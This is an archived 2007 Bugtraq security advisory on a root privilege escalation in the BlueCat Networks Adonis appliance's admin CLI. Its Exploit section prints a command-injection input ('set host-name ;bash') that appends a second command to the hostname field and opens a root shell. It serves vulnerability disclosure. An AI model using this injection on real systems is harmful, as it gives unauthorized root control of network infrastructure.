lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CHILKAT-MID-2d1e4574-3bdd-4bf3-a995-bdb14ee0b42c@uweb002>
Date: Fri, 17 Aug 2007 01:50:28 +0900
From: "anonymous.c7ffa4057a" <anonymous.c7ffa4057a@...nymousspeech.com>
To: bugtraq@...urityfocus.com
subject: TS-2007-003-0: BlueCat Networks Adonis CLI root privilege escalation

Template Security Security Advisory
-----------------------------------

  BlueCat Networks Adonis CLI root privilege escalation

  Date: 2007-08-16
  Advisory ID: TS-2007-003-0
  Vendor: BlueCat Networks, http://www.bluecatnetworks.com/
  Revision: 0

Contents
--------

  Summary
  Software Version
  Details
  Impact
  Exploit
  Workarounds
  Obtaining Patched Software
  Credits
  Revision History

Summary
-------

  Template Security has discovered a root privilege escalation
  vulnerability in the BlueCat Networks Adonis DNS/DHCP appliance
  which allows the admin user to gain root privilege from the
  Command Line Interface (CLI).

Software Version
----------------

  Adonis version 5.0.2.8 was tested.

Details
-------

  The admin account on the Adonis DNS/DHCP appliance provides
  access to a CLI that allows an administrator to perform tasks
  such as setting the IP address, netmask, system time and system
  hostname.  By entering a certain command sequence, the
  administrator is able to execute a command as root.

Impact
------

  Access to the admin account is the same as root access on the
  appliance.

Exploit
-------

  Here we use the 'set host-name' CLI command to execute a root
  shell:

    :adonis>set host-name ;bash
    adonis.katter.org
    root@...nis:~# id
    uid=0(root) gid=0(root) groups=0(root)

  NOTE: There may be other command sequences that accomplish the
  same result.

Workarounds
-----------

  Only provide admin account access to administrators that also
  have root account access on the appliance.

Obtaining Patched Software
--------------------------

  Contact the vendor.

Credits
-------

  forloop discovered this vulnerability while enjoying a Tuborg
  Gold.  forloop is a member of Template Security.

Revision History
----------------

  2007-08-16: Revision 0 released


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ